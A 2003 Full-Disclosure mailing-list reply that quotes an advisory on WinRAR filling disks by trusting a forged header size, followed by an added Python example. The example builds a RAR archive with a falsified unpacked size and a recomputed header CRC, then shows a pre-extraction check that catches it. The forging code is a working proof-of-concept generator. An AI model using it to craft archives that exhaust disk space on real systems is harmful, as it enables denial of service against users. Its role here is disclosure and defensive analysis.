RE: [Full-Disclosure] Winrar doesn't determine the actual size of compressed files

From: Rainer Gerhards (rgerhards_at_hq.adiscon.com)
Date: 09/09/03

    To: <door_hUNT3R@blackcodemail.com>, <full-disclosure@lists.netsys.com>
    Date: Tue, 9 Sep 2003 14:49:31 +0200
    
    

    tested with 3.20 - can't reproduce. It says "file is corrupt", I press "close" - nothing happened....

    Rainer

    > -----Original Message-----
    > From: Bipin Gautam [mailto:door_hUNT3R@blackcodemail.com]
    > Sent: Tuesday, September 09, 2003 1:02 PM
    > To: full-disclosure@lists.netsys.com
    > Subject: [Full-Disclosure] Winrar doesn't determine the
    > actual size of compressed files
    >
    >
    > ---[ about WinRAR]---
    > Winrar (http://www.rarsoft.com/) is one of the most popular
    > file compression utilities for Windows.
    >
    > --[summary]---
    > Winrar incorrectly determines the actual size of compressed
    > files saved in .rar format by reading its header information.
    >
    > --[details]--
    > Recently we managed to devise a technique to spoof the header
    > and create a valid CRC checksum. Later we found that Winrar
    > only depends on its header information and CRC checksum to
    > determine the size and integrity of .rar files. Before
    > uncompressing .rar files, Winrar pre-allocates space
    > according to the actual file size specified in the header to
    > avoid fragmentation. But pre-allocation occurs without
    > checking the available hdd space. Then it goes on extracting,
    > even if the hdd size is less than the size of the files. We
    > did a test by extracting 1GB files on a hdd with 700MB free space.
    >
    > Surprisingly, we later discovered that even on detecting
    > header corruption WinRAR does not stop the extraction
    > process. This leads WinRAR to believe that the actual size is
    > correct. We managed to exploit this and create a proof of
    > concept to demonstrate this problem by changing the actual
    > file size in its header. When it starts extracting it
    > doesn't find any valid data in the archive, and on the basis
    > of its header it attempts to extract 1 gigabyte of data and
    > simply goes on writing "0x00", filling up valuable hdd space.
    >
    > --[Proof of concept]--
    > The proof of concept is a valid .rar file which is just 100
    > bytes, but its header has been forged to fool Winrar into
    > thinking that it's a 1 gigabyte file, by forging its header
    > and creating a valid CRC checksum. All versions of Winrar
    > (up to 3.20 - the latest version to date) seem to be vulnerable.
    >
    > The proof of concept of .rar file can be obtained from the
    > following URL: http://www.geocities.com/visitbipin/test123.zip
    > If you extract the file, Winrar will try to extract this
    > 100-byte .rar file trusting the information in its header and
    > not the integrity of its data.
    >
    > --[Background Information]--
    > This bug was originally discovered by hUNT3R, a member of 01
    > Security Submission. The vendor was notified via email.
    > Further discussion took place in 01 Security Submission's
    > forum with the developer of Winrar (Eugene Roshal):
    > URL: http://www.ysgnet.com/phorum/read.php?f=1&i=341&t=324#reply_341
    >
    > ---[about 01 security submission]---
    > 01s.s is a small group with experience as security
    > specialists, programmers and system administrators.
    > http://www.ysgnet.com/hn.
    >
    >
    >
    > | .oÛ_Oo.h»UNTER.oO_Ûo. |
    > § !¹007Õ°¿ÑïÞÎß°Õæ9*½¹! ‡
    >
    > _____________________________________________________________
    > Secure mail ---> http://www.blackcode.com
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html
    >

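The forging technique the post describes (a size field rewritten, the header checksum recomputed so it still validates) and the pre-extraction check it implies are shown below as an added example; this is not code from the post, from 01 Security Submission or from WinRAR. It assumes the RAR 2.x/3.x block-header layout as published in the unrar sources (a 7-byte common header, HEAD_CRC being the low 16 bits of the CRC32 over the rest of the header, PACK_SIZE and UNP_SIZE in the file header). The archive builder, the `hello.txt` sample entry and the 700 MB free-space figure are constructed for the demonstration, and `extraction_budget_ok` is a hypothetical check of the kind the post says WinRAR 3.20 lacks, not anything WinRAR implements.

```python
import struct
import zlib
from typing import List, Optional, Tuple

# RAR 2.x/3.x signature; it doubles as the marker block (HEAD_CRC 'Ra', type 0x72, flags 0x1a21, size 7).
RAR_SIGNATURE = b"Rar!\x1a\x07\x00"
HEAD_TYPE_ARCHIVE, HEAD_TYPE_FILE, HEAD_TYPE_END = 0x73, 0x74, 0x7B
FLAG_LONG_BLOCK = 0x8000   # block carries ADD_SIZE (for a file header that is PACK_SIZE)
FLAG_LARGE = 0x0100        # file header carries HIGH_PACK_SIZE / HIGH_UNP_SIZE
METHOD_STORED = 0x30


def _seal(body: bytes) -> bytes:
    """Prefix a header body (HEAD_TYPE .. end of header) with its HEAD_CRC.

    HEAD_CRC is the low 16 bits of CRC32 over the rest of the header, so anyone
    who edits a field just recomputes it; a valid HEAD_CRC says nothing about
    whether the size fields agree with the data that follows the header.
    """
    return struct.pack("<H", zlib.crc32(body) & 0xFFFF) + body


def build_stored_rar(name: bytes, data: bytes, declared_unp_size: Optional[int] = None) -> bytes:
    """Constructed test archive: one entry, method 0x30 (stored), no compression.

    declared_unp_size writes an arbitrary UNP_SIZE into the file header (the
    way the post's 100-byte archive claims a 1 GB file); the header CRC is
    recomputed so the forged header still validates.
    """
    unp_size = len(data) if declared_unp_size is None else declared_unp_size
    archive_hdr = _seal(struct.pack("<BHH", HEAD_TYPE_ARCHIVE, 0x0000, 13) + b"\x00" * 6)
    file_hdr = _seal(struct.pack(
        "<BHHIIBIIBBHI",
        HEAD_TYPE_FILE,
        FLAG_LONG_BLOCK,                # file headers always carry PACK_SIZE as ADD_SIZE
        32 + len(name),                 # HEAD_SIZE: 32 fixed bytes plus the file name
        len(data),                      # PACK_SIZE: what is really in the archive
        unp_size,                       # UNP_SIZE: what an extractor would pre-allocate
        2,                              # HOST_OS: Win32
        zlib.crc32(data) & 0xFFFFFFFF,  # FILE_CRC
        0,                              # FTIME (DOS date/time), irrelevant here
        20,                             # UNP_VER: 2.0 is enough for stored data
        METHOD_STORED,
        len(name),                      # NAME_SIZE
        0x20,                           # ATTR: FILE_ATTRIBUTE_ARCHIVE
    ) + name)
    end_hdr = _seal(struct.pack("<BHH", HEAD_TYPE_END, 0x4000, 7))
    return RAR_SIGNATURE + archive_hdr + file_hdr + data + end_hdr


def scan_headers(archive: bytes) -> List[dict]:
    """Walk the block headers without extracting; return one dict per file entry."""
    if not archive.startswith(RAR_SIGNATURE):
        raise ValueError("not a RAR 2.x/3.x archive")
    entries = []
    pos = len(RAR_SIGNATURE)
    while pos + 7 <= len(archive):
        head_crc, head_type, flags, head_size = struct.unpack_from("<HBHH", archive, pos)
        if head_size < 7 or pos + head_size > len(archive):
            raise ValueError("bad HEAD_SIZE at offset %d" % pos)
        crc_ok = (zlib.crc32(archive[pos + 2:pos + head_size]) & 0xFFFF) == head_crc
        skip = head_size
        if flags & FLAG_LONG_BLOCK:
            skip += struct.unpack_from("<I", archive, pos + 7)[0]   # ADD_SIZE
        if head_type == HEAD_TYPE_FILE:
            (pack_size, unp_size, _host_os, _file_crc, _ftime, _unp_ver,
             method, name_size, _attr) = struct.unpack_from("<IIBIIBBHI", archive, pos + 7)
            name_off = pos + 32
            if flags & FLAG_LARGE:
                high_pack, high_unp = struct.unpack_from("<II", archive, pos + 32)
                pack_size |= high_pack << 32
                unp_size |= high_unp << 32
                name_off += 8
                skip = head_size + pack_size   # ADD_SIZE only held the low 32 bits
            entries.append({
                "name": archive[name_off:name_off + name_size].decode("latin-1"),
                "pack_size": pack_size, "unp_size": unp_size,
                "method": method, "crc_ok": crc_ok,
            })
        pos += skip
        if head_type == HEAD_TYPE_END:
            break
    return entries


def extraction_budget_ok(archive: bytes, free_bytes: int) -> Tuple[bool, List[str]]:
    """Hypothetical pre-extraction check: refuse before pre-allocating anything.

    Rejects a failed header CRC, a stored entry whose UNP_SIZE differs from its
    PACK_SIZE (stored data cannot expand), and a declared total that exceeds
    the free space the caller reports.
    """
    problems = []
    total = 0
    for e in scan_headers(archive):
        if not e["crc_ok"]:
            problems.append("%s: header CRC mismatch" % e["name"])
        if e["method"] == METHOD_STORED and e["unp_size"] != e["pack_size"]:
            problems.append("%s: stored entry declares %d unpacked bytes but holds %d"
                            % (e["name"], e["unp_size"], e["pack_size"]))
        total += e["unp_size"]
    if total > free_bytes:
        problems.append("declared unpacked size %d exceeds free space %d" % (total, free_bytes))
    return not problems, problems


if __name__ == "__main__":
    # Constructed sample: an honest archive and one whose header claims 1 GiB.
    honest = build_stored_rar(b"hello.txt", b"hello world\n")
    forged = build_stored_rar(b"hello.txt", b"hello world\n", declared_unp_size=1 << 30)
    for label, arc in (("honest", honest), ("forged", forged)):
        ok, why = extraction_budget_ok(arc, free_bytes=700 * 1024 * 1024)
        print("%s (%d bytes): %s" % (label, len(arc), "OK" if ok else "; ".join(why)))
```

The forged archive passes the header CRC exactly as the post reports, because the CRC only covers the header bytes and was recomputed after the edit. What catches it is consistency between fields the extractor can see before writing anything: a stored entry whose UNP_SIZE is not equal to its PACK_SIZE, and a declared total larger than the space available. Both checks are cheap and happen before a single byte is pre-allocated; for compressed methods the first check does not apply, but the free-space check and a sanity limit on the UNP_SIZE/PACK_SIZE ratio still do.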


